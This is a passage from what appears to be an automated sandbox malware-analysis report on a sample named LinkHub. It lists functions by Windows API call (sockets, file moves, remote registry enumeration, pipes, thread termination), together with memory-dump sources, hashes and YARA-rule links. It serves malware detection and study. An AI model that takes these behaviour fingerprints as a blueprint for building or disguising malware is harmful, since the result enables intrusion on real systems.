socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00B81B6F
WSAGetLastError.WSOCK32 ref: 00B81B7E
WSAGetLastError.WSOCK32 ref: 00B81C26
closesocket.WSOCK32(00000000), ref: 00B81C56

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
String ID:
API String ID: 2675159561-0
Opcode ID: cdcc6dddbb53eb70a7fee918c4b63225c1341662e9672aa77fbb9548a90bd929
Instruction ID: ff6feffe7ca69a68436e3cc2aeb386ce906c1616c28a1b653d41438f58d7a418
Opcode Fuzzy Hash: cdcc6dddbb53eb70a7fee918c4b63225c1341662e9672aa77fbb9548a90bd929
Instruction Fuzzy Hash: 3141D471601104AFDB10AF68C984BA9BBEDEF45324F148499F8159B2A2DB74ED42CFE1

Function 00B6D7AB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B6E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00B6D7CD,?), ref: 00B6E714

Part of subcall function 00B6E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00B6D7CD,?), ref: 00B6E72D

lstrcmpiW.KERNEL32(?,?), ref: 00B6D7F0
MoveFileW.KERNEL32(?,?), ref: 00B6D82A
_wcslen.LIBCMT ref: 00B6D8B0
_wcslen.LIBCMT ref: 00B6D8C6
SHFileOperationW.SHELL32(?), ref: 00B6D90C

Strings

\*.*, xrefs: 00B6D89E

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 3164238972-1173974218
Opcode ID: a89a69a64d331991ef2f8bb5f2ef3198139677a531f2b41dd2e97787615a6911
Instruction ID: 52fdebdcef3890ff2cd51ab21b0621a007762f90d8c666dd9b8acb672aba3053
Opcode Fuzzy Hash: a89a69a64d331991ef2f8bb5f2ef3198139677a531f2b41dd2e97787615a6911
Instruction Fuzzy Hash: 3E414475D052189EDF12EBA4DA85FDE77F8EF18340F1000EAA509EB141EB38A788CB50

Function 00B93899 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00B938B8
GetWindowLongW.USER32(?,000000F0), ref: 00B938EB
GetWindowLongW.USER32(?,000000F0), ref: 00B93920
SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00B93952
SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00B9397C
GetWindowLongW.USER32(?,000000F0), ref: 00B9398D
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00B939A7

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: eb92f8457a05c987a6a4b1b85437f8da15d11cf6955439dfa15ddf62a89b3c92
Instruction ID: ffa67f69202b8b11c5ae613235e3310dbe677f20b01a07baa5c09c4a0955cc5d
Opcode Fuzzy Hash: eb92f8457a05c987a6a4b1b85437f8da15d11cf6955439dfa15ddf62a89b3c92
Instruction Fuzzy Hash: EB313130605291AFDB218F49DC98F643BE1FB8AB10F1501B5F5128B2B2CBB5AD44CB41

Function 00B6808D Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B680D0
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B680F6
SysAllocString.OLEAUT32(00000000), ref: 00B680F9
SysAllocString.OLEAUT32(?), ref: 00B68117
SysFreeString.OLEAUT32(?), ref: 00B68120
StringFromGUID2.OLE32(?,?,00000028), ref: 00B68145
SysAllocString.OLEAUT32(?), ref: 00B68153

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: f71667e70704e5e15c05156e6053b8ad03dda702cbdcfc451a6f6a53f28e1235
Instruction ID: f3cbe65eb22a1d17166c472b23358eb7c2f58be766be8ee6544b93f6c2e2b3cc
Opcode Fuzzy Hash: f71667e70704e5e15c05156e6053b8ad03dda702cbdcfc451a6f6a53f28e1235
Instruction Fuzzy Hash: 97219572600219AF9F10DFA9DC84CBA73ECEB093647448565F905EB291DA74DC468761

Function 00B68164 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B681A9
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B681CF
SysAllocString.OLEAUT32(00000000), ref: 00B681D2
SysAllocString.OLEAUT32 ref: 00B681F3
SysFreeString.OLEAUT32 ref: 00B681FC
StringFromGUID2.OLE32(?,?,00000028), ref: 00B68216
SysAllocString.OLEAUT32(?), ref: 00B68224

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 60f64d32f628f934cf81b9182b69ffcc57ec71ae36de1450258860806da4416c
Instruction ID: 2e0e45ec84f76a8f93116249167d0d3e20ed8de9b69187153087d0471153d056
Opcode Fuzzy Hash: 60f64d32f628f934cf81b9182b69ffcc57ec71ae36de1450258860806da4416c
Instruction Fuzzy Hash: 9F21B371600214BF9B10EFA9EC99DAA77ECFB093607008266F905DB2A1DE74EC41CB64

Function 00B70E79 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00B70E99
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00B70ED5

Strings

nul, xrefs: 00B70F0E

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 6c935b86c8750a39de05772eb7d9786ea9037007339e4eb20295d5f53b8298ee
Instruction ID: 11809bda9a1ad1ba86034c7f19a3ca26dcafca57a7391ffdacf4df4336ef982f
Opcode Fuzzy Hash: 6c935b86c8750a39de05772eb7d9786ea9037007339e4eb20295d5f53b8298ee
Instruction Fuzzy Hash: 08215E7051430AEBDB30AF25D945A9A77E8EF54720F208A9AFCB9E72D0DB709940CB50

Function 00B70F4E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00B70F6D
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00B70FA8

Strings

nul, xrefs: 00B70FE0

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: c1265c48887a3ff8458f4d7a7f034dbd4851a1325d90680bd8c776af97e8cbbd
Instruction ID: c58354d740ce956bf4eb2319cc9efe64425df70a2abc19fd5b9d32dbef09c150
Opcode Fuzzy Hash: c1265c48887a3ff8458f4d7a7f034dbd4851a1325d90680bd8c776af97e8cbbd
Instruction Fuzzy Hash: 1D218B31500305EBDB309F6D8D44A9A77E8EF55720F208A5AF8B5E72D0DB709880DB60

Function 00B94B4B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B07873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00B078B1
Part of subcall function 00B07873: GetStockObject.GDI32(00000011), ref: 00B078C5
Part of subcall function 00B07873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B078CF

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00B94BB0
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00B94BBD
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00B94BC8
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00B94BD7
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00B94BE3

Strings

Msctls_Progress32, xrefs: 00B94B81

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 08725156e816f1620b1a676595e75e6583553d38844144a526ba4c4d66d3a97d
Instruction ID: 3bd0281964f29b7bdd1691585e48703a97db76ded5512cf3ce31892090d7ff23
Opcode Fuzzy Hash: 08725156e816f1620b1a676595e75e6583553d38844144a526ba4c4d66d3a97d
Instruction Fuzzy Hash: 9811B6B154021DBEEF119FA5CC85EE77F9DEF08798F014111B618A20A0CB72DC21DBA0

Function 00B3DB5F Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00B3DB23: _free.LIBCMT ref: 00B3DB4C

_free.LIBCMT ref: 00B3DBAD

Part of subcall function 00B32D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00B3DB51,?,00000000,?,00000000,?,00B3DB78,?,00000007,?,?,00B3DF75,?), ref: 00B32D4E
Part of subcall function 00B32D38: GetLastError.KERNEL32(?,?,00B3DB51,?,00000000,?,00000000,?,00B3DB78,?,00000007,?,?,00B3DF75,?,?), ref: 00B32D60

_free.LIBCMT ref: 00B3DBB8
_free.LIBCMT ref: 00B3DBC3
_free.LIBCMT ref: 00B3DC17
_free.LIBCMT ref: 00B3DC22
_free.LIBCMT ref: 00B3DC2D
_free.LIBCMT ref: 00B3DC38

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
Instruction ID: 68ad8d0ff92aca813ff9fd090d2377f7f5a66a4183cc63fa464d72fbb07d77e6
Opcode Fuzzy Hash: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
Instruction Fuzzy Hash: 8A113372941B04BAD521BBB0EC07FCBB7DC9F14700F514CE9B299AA152EA75B5058760

Function 00B6E30E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00B6E328
LoadStringW.USER32(00000000), ref: 00B6E32F
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00B6E345
LoadStringW.USER32(00000000), ref: 00B6E34C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00B6E390

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00B6E36D

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: 322326c6d232dfcce3d5ce3edcee2183e3ad9caf208e52d98aa3b9ca435534e8
Instruction ID: 2e506146b26acfcdd9117ba235f477ae66bc6766c12399dbd69f617ae559e65d
Opcode Fuzzy Hash: 322326c6d232dfcce3d5ce3edcee2183e3ad9caf208e52d98aa3b9ca435534e8
Instruction Fuzzy Hash: 690162F69002087FE71197A5CE89EE677BCD708700F004592B706E7041EA749E848B75

Function 00B71312 Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00B71322
EnterCriticalSection.KERNEL32(00000000,?), ref: 00B71334
TerminateThread.KERNEL32(00000000,000001F6), ref: 00B71342
WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00B71350
CloseHandle.KERNEL32(00000000), ref: 00B7135F
InterlockedExchange.KERNEL32(?,000001F6), ref: 00B7136F
LeaveCriticalSection.KERNEL32(00000000), ref: 00B71376

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 0c5e898b66c05ce5ee6042b6cf510679431496bd8d057034fcd9e3087f8eff9d
Instruction ID: f3247a1d7cce3789ad0dd0ddcf3be9c791fe9c8b741084d2b653a0112bb5aa6d
Opcode Fuzzy Hash: 0c5e898b66c05ce5ee6042b6cf510679431496bd8d057034fcd9e3087f8eff9d
Instruction Fuzzy Hash: 5AF0EC32046612BBD7411B59EF89BD6BB79FF04306F801522F102928A0CB759471CFA4

Function 00B826BD Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00B8281D
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00B8283E
WSAGetLastError.WSOCK32 ref: 00B8284F
htons.WSOCK32(?,?,?,?,?), ref: 00B82938
inet_ntoa.WSOCK32(?), ref: 00B828E9

Part of subcall function 00B6433E: _strlen.LIBCMT ref: 00B64348

Part of subcall function 00B83C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00B7F669), ref: 00B83C9D

_strlen.LIBCMT ref: 00B82992

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
String ID:
API String ID: 3203458085-0
Opcode ID: 4051271e27d8092c0961fe15395d1ba62cf836e41e470a8d9c7cf595b155e6ed
Instruction ID: 1c28fec7b32643f82bfa0c44bf3ee971ab78d527e9fdc19db3cc91a1476f478c
Opcode Fuzzy Hash: 4051271e27d8092c0961fe15395d1ba62cf836e41e470a8d9c7cf595b155e6ed
Instruction Fuzzy Hash: AAB1BE35604301AFD324EF24C885E2ABBE5EF84318F54899CF55A5B2E2DB31ED46CB91

Function 00B30527 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 00B3042A
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B30446
__allrem.LIBCMT ref: 00B3045D
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B3047B
__allrem.LIBCMT ref: 00B30492
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B304B0

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 675459f4f124bd2af17bf05e9c9e87198950a75667ee82f7844c946ca9c63f73
Instruction ID: 76b8a805c6e85e75aeccc4650675cdb458ff3c2b491cf2eb351b60d386efa7a9
Opcode Fuzzy Hash: 675459f4f124bd2af17bf05e9c9e87198950a75667ee82f7844c946ca9c63f73
Instruction Fuzzy Hash: E481FA72A107069BE724BF69CCA2B6B73F8EF54324F3441AAF511D7681E770DA008794

Function 00B36571 Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00B28649,00B28649,?,?,?,00B367C2,00000001,00000001,8BE85006), ref: 00B365CB
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00B367C2,00000001,00000001,8BE85006,?,?,?), ref: 00B36651
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00B3674B
__freea.LIBCMT ref: 00B36758

Part of subcall function 00B33B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00B20165,?,?,00B711D9,0000FFFF), ref: 00B33BC5

__freea.LIBCMT ref: 00B36761
__freea.LIBCMT ref: 00B36786

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 891ee4af7f874be8aa99edc248c9930ebdf0865ea0c097fe4117e8ce075226a8
Instruction ID: 4331be4a115ce3a79be5cb5d33b7d4b7c80fca78d17dbdb4ef52623932feda70
Opcode Fuzzy Hash: 891ee4af7f874be8aa99edc248c9930ebdf0865ea0c097fe4117e8ce075226a8
Instruction Fuzzy Hash: 83510E72610216BFEB258F64CC85EAB77EAEB40754F3486A9FD18D6140EB34DC4086A0

Function 00B8C63B Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B0B329: _wcslen.LIBCMT ref: 00B0B333

Part of subcall function 00B8D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B8C10E,?,?), ref: 00B8D415
Part of subcall function 00B8D3F8: _wcslen.LIBCMT ref: 00B8D451
Part of subcall function 00B8D3F8: _wcslen.LIBCMT ref: 00B8D4C8
Part of subcall function 00B8D3F8: _wcslen.LIBCMT ref: 00B8D4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B8C72A
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B8C785
RegCloseKey.ADVAPI32(00000000), ref: 00B8C7CA
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00B8C7F9
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00B8C853
RegCloseKey.ADVAPI32(?), ref: 00B8C85F

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 1120388591-0
Opcode ID: 28960337a321e49e2b45ed3858fa2fc52b8f0a721ce9bcd662f5e9714504c7ba
Instruction ID: 04986e08c41683c5ea7ed386dd1904425438b5949dc569dccd556e80f999affa
Opcode Fuzzy Hash: 28960337a321e49e2b45ed3858fa2fc52b8f0a721ce9bcd662f5e9714504c7ba
Instruction Fuzzy Hash: F9819F75208341AFD714EF24C895E2ABBE5FF84308F14899DF4594B2A2DB31ED45CBA2

Function 00B6009D Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000035), ref: 00B600A9
SysAllocString.OLEAUT32(00000000), ref: 00B60150
VariantCopy.OLEAUT32(00B60354,00000000), ref: 00B60179
VariantClear.OLEAUT32(00B60354), ref: 00B6019D
VariantCopy.OLEAUT32(00B60354,00000000), ref: 00B601A1
VariantClear.OLEAUT32(?), ref: 00B601AB

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

